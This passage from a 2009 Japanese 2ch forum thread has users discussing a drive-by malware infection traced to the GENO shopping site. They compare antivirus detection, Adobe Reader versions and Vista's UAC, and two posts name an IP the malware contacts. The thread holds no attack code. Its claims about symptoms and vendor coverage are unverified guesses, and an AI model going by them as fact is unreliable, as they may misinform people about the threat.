今日ZIPスレで斧かアルカンのアドレスだったのに、そこのHPにぶっとばされたきがする
それから調子悪くて復元した・・・

940 : 菜の花(高知県):2009/04/05(日) 23:09:13.39 ID:MEiFlb6S
Readerインストールしたままで放置してたから
同意すんの?あ?って画面が出ただけだった
残念!

941 : ハハコグサ(愛知県):2009/04/05(日) 23:09:17.75 ID:cpNZQC7u
>Norton セーフウェブでこのサイトの問題は見つかりませんでした。

本当か?先生

942 : シャクヤク(千葉県):2009/04/05(日) 23:09:51.24 ID:vu3s2jT4
むしろカスペル社員の陰謀だろ
カスペル信者がこのスレには多すぎる

943 : ボタン(宮城県):2009/04/05(日) 23:10:58.36 ID:9Sinp90Q
>>939
このスレにも偽装あるから気をつけろよ

944 : ロベリア(catv?):2009/04/05(日) 23:11:31.00 ID:wYtraUSy
>>930
ノートン360は大丈夫だった。

945 : イワカガミダマシ(長屋):2009/04/05(日) 23:13:25.73 ID:s0RyXoIc
いまだに対応してないソフトはもうゴミと言っていいなw

946 : クリサンセコム・ムルチコレ(コネチカット州):2009/04/05(日) 23:13:39.78 ID:jisCmmPw
カスペならもう駆除できる?

947 : パキスタキス(アラバマ州):2009/04/05(日) 23:15:59.06 ID:fI6jsCMH
ジェノってジェノサイドって意味だなきっと

948 : ツゲ(愛知県):2009/04/05(日) 23:16:12.23 ID:Z/HJUnwU
解雇SEの仕業か

949 : タチイヌノフグリ(東京都):2009/04/05(日) 23:17:35.98 ID:TjPgIIyG
今まで10年くらいなんとなくバスター買ってきたけど
もうカワネ。

950 : オオタチツボスミレ(新潟県):2009/04/05(日) 23:17:38.42 ID:gup1CDf2
>>914のアドレスも踏むとヤバイ?

951 : キブシ(東京都):2009/04/05(日) 23:17:52.53 ID:DnN+1jAr
ビスタ厨が勝利とか・・・信じられん

952 : ホトケノザ(宮城県):2009/04/05(日) 23:18:27.88 ID:8wgW2qcC
カスペルとバスターのオンラインスキャンと自前のノートン360で問題なかったんだけど
セーフってことでいいの?
VistaのWindowsUpdateは最新でAdobeReaderも9.1.0だったんだけど・・・

953 : プリムラ(岡山県):2009/04/05(日) 23:18:44.60 ID:K85pVQ7U
geno系は全部だめなはず.


954 : ツボスミレ(大阪府):2009/04/05(日) 23:19:17.14 ID:qQ0y0bZt
いつになったらノートン・バスターは対応するんだよ
カスペに遅れるのはわかるがKINGに先越されるようではなー
Sソフト最新verでと過信した人がひっかかる。新型恐るべし。

955 : ハナビシソウ(宮崎県):2009/04/05(日) 23:19:31.71 ID:dLvh0j0o
フラッシュ最新で感染無し

956 : アメリカヤマボウシ(富山県):2009/04/05(日) 23:20:11.11 ID:qHl/Fgrx
>>952
もう一度、genoに繋いで確認すればいい

957 : ライラック(埼玉県):2009/04/05(日) 23:23:37.73 ID:ix8+po7T
最新のウイルスですよ
本当に感染は無いのかな(・∀・)ニヤニヤ

958 : コスミレ(山梨県):2009/04/05(日) 23:24:48.46 ID:mzjiAyCz
なんだよ、復元で治っちゃうじゃんか。つまんねえの


959 : ホトケノザ(宮城県):2009/04/05(日) 23:25:07.54 ID:8wgW2qcC
>>956
二度と繋ぎたくないです

960 : スズメノヤリ(愛知県):2009/04/05(日) 23:25:11.60 ID:YhBqCRka
やはりクリーンインスコが精神衛生上一番良い。
めんどくさくて放置してたSSDに換える良いきっかけになったよ。

961 : ツゲ(愛知県):2009/04/05(日) 23:26:03.13 ID:Z/HJUnwU
cmdが立ち上がらん苦なるな

962 : 藤(神奈川県):2009/04/05(日) 23:26:19.98 ID:7VElRfeM
>>173
誤検出じゃない
【注文0.1】Genoのサイトでウイルス感染…か?★2
http://tsushima.2ch.net/test/read.cgi/news/1238897231/
【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/
Avastは優秀だなノートンとか検出できてないのに

963 : 藤(神奈川県):2009/04/05(日) 23:27:17.90 ID:7VElRfeM
>>962は別の板に貼ろうとしてミスった

964 : プリムラ(岡山県):2009/04/05(日) 23:27:23.15 ID:K85pVQ7U
とりあえず、面白がっていろんなとこに広げてる奴とか・・・・。

965 : ミツマタ(兵庫県):2009/04/05(日) 23:29:51.11 ID:HtG3+G4G
気になってウイルススキャンしてみたら、
違うやつが出てきたでござる。

966 : ウグイスカグラ(東日本):2009/04/05(日) 23:31:27.94 ID:P9XFIFVK
>>951
のちに「V作戦」として、語り継がれることになる

967 : タツタソウ(埼玉県):2009/04/05(日) 23:32:40.58 ID:KVAjhyIK
>>951
UACの本領発揮だろ?

VistaはUIが致命的に取っつきにくいだけで、
根幹部分の設計は間違ってない

968 : サイネリア(東京都):2009/04/05(日) 23:34:37.29 ID:KPcOMmKo
vistaつえええ

969 : ケマンソウ(沖縄県):2009/04/05(日) 23:34:55.38 ID:i2znmR1L
明日朝GENOの動向に注目だな

970 : クロッカス(中部地方):2009/04/05(日) 23:35:05.55 ID:Szj0XPum
そろそろ次スレを

971 : ツボスミレ(大阪府):2009/04/05(日) 23:38:07.05 ID:qQ0y0bZt
鬱陶しさ全開のUACを評価することになるとはな
まさかVISTAの価値を認めさせるためのMSの陰謀なのか!?

972 : マムシグサ(茨城県):2009/04/05(日) 23:39:06.75 ID:ZsqI05SR
じゃGENOはお詫びとしてウイルス食らった人全員にVista進呈すれば良いと思うよ

973 : ムラサキナズナ(北海道):2009/04/05(日) 23:42:43.61 ID:OijEresq
>>1
おいおいおい、なんでこのURLが紫色になってんだよ?

974 : 雪割草(群馬県):2009/04/05(日) 23:43:00.42 ID:yXbbOzeO
なんだ真面目にウイルスなのか
はよ対応せーや滓ペロペロスキー
ド田舎徳島とロシアのタッグじゃ無理か

975 : オオイヌノフグリ(アラバマ州):2009/04/05(日) 23:44:09.66 ID:bgG3HYOY
サイト作ったITソリューションの動向も見たいな
点プレに入れておいてくれ

976 : イワウチワ(西日本):2009/04/05(日) 23:45:16.24 ID:hPqD5s7R
>>942
多くはカスペル社に報告された物が
他社製品の定義ファイルに反映される
更新頻度といい間違ってはいない

977 : ヘラオオバコ(東京都):2009/04/05(日) 23:45:28.09 ID:RKP2OQzJ ?PLT(17000)

今まで最強無防備マンだったけど、久しぶりにavast入れたぜ
全スキャンなんて数年ぶりだ

janeで誤検出あっただけで検出ナシだぜ
やっぱり最強

978 : ミツマタ(アラバマ州):2009/04/05(日) 23:53:31.20 ID:ZneJRqFx
土日の2日間放置ってのはGENO悪質だな

979 : ダイセノダマキ(東京都):2009/04/05(日) 23:53:59.43 ID:hII8ksDa
失う情報なんてないわー

980 : プリムラ・オーリキュラ(徳島県):2009/04/05(日) 23:54:05.07 ID:+tR3l+Ok
>>974
徳島舐めんな

981 : ヒサカキ(愛媛県):2009/04/05(日) 23:54:16.53 ID:JSbm8B6Q
>>951
マイクロソフトの工作にだまされるなよ
情強である俺たちニュー速民はは一生XPで行く
それがチームだ

982 : メギ(アラバマ州):2009/04/05(日) 23:54:45.17 ID:IS7Wlo3y
うめ

983 : ミヤコワスレ(愛知県):2009/04/05(日) 23:54:56.40 ID:sRSzXb9o


984 : 雪割草(群馬県):2009/04/05(日) 23:55:21.71 ID:yXbbOzeO
>>980
良く整備されたバイパスを使って行く先は結局市街地ってバイパス使う意味無いよね

985 : 藤(神奈川県):2009/04/05(日) 23:56:16.34 ID:7VElRfeM
>>981
俺はWin7付きEeePCかAspire one出るになるまでXPで行くぜ

986 : ムラサキケマン(アラバマ州):2009/04/05(日) 23:57:53.52 ID:URFZ3t0d
win7SP1が出てSSDが安くなったら乗り変える

987 : ポピー(長屋):2009/04/05(日) 23:58:39.04 ID:ggqLVj0N
次スレいる?

988 : ヒサカキ(静岡県):2009/04/05(日) 23:58:50.82 ID:Sl9ijmtO
相変わらず94.247.2.195に繋ごうとするな
ルーターでこのIPをブロックしたら↓こうなったまま
ttp://www1.axfc.net/uploader/Img/so/42046.jpg

989 : モクレン(アラバマ州):2009/04/06(月) 00:00:08.78 ID:IS7Wlo3y
うめ

990 : 姫カンムリシャジン(山梨県):2009/04/06(月) 00:00:24.38 ID:YrgCdLng
acrobatreader5.0は勝ち組?

991 : サクラソウ(dion軍):2009/04/06(月) 00:00:30.50 ID:3fnFEon2
>>987
いる

992 : アルメリア(北海道):2009/04/06(月) 00:00:34.32 ID:bn8j3/Lf
1000ならウィルス被害の生存者無し

993 : ノミノフスマ(東日本):2009/04/06(月) 00:00:51.68 ID:mhUW5Rhl
ウィルスの名前もわからないし、Adobe製品の脆弱性を突くという以外
どういう振る舞いをするのかよくわからないし、各社アンチウィルスの
対応状況もよくわからんのだよね。
94.247.2.195に対する通信が発生する以外にどんな悪さをしてるんだろ。

今のところ対応済みなのはAvast!とカスペのみ?
キングも対応済み?
ノートン、バスターは×
他はどうなんだろうね?



994 : キクザキイチゲ(群馬県):2009/04/06(月) 00:01:15.36 ID:rT+ikxsy
1000なら御坂妹もう10万人ほどおかわり

995 : コハコベ(千葉県):2009/04/06(月) 00:01:26.36 ID:9Adf0bya
        *'``・* 。
        | 人  `*
        |(__)  `*。   梅〜♪
       ,。∩__)  *
      + (・∀・ ) *。+゚   
      `*。 ヽ、  つ *゚*
       `・+。*・' ゚⊃ +゚
       ☆   ∪~ 。*゚
        `・+。*・ ゚


996 : ミヤマアズマギク(愛知県):2009/04/06(月) 00:01:27.00 ID:YDHB6Sij


997 : サクラソウ(愛知県):2009/04/06(月) 00:01:35.26 ID:KKboP1WA
まとめ↓であってるの?

1.最新ではないAcroBatReaderのバージョン8がインスコされているとPC内にPDFがわんさか増殖してHDDを食いつぶす。
2.その際にCPU負荷がとんでもない状況になってブラウザが落ちたり操作不能でリセットボタンを「ぽちっとな」する羽目に。
3.OS再起動するとブルースクリーンになり再インスコする羽目に。

998 : サクラソウ(dion軍):2009/04/06(月) 00:01:45.13 ID:3fnFEon2
1000ならGENO終了

999 : チャボトウジュロ(福岡県):2009/04/06(月) 00:02:08.72 ID:UF/PcuEl
ν速公認ベンチマークブログ
いつでもレタス
http://azcji.cocolog-nifty.com/blog/cat1459704/index.html


1000 : クサノオウ(長野県):2009/04/06(月) 00:02:11.12 ID:dJYwXaAK
1000ならGENO狩猟

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しい職を探して下さい。。。

                            ニュース速報
              http://www.hellowork.go.jp/


208 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)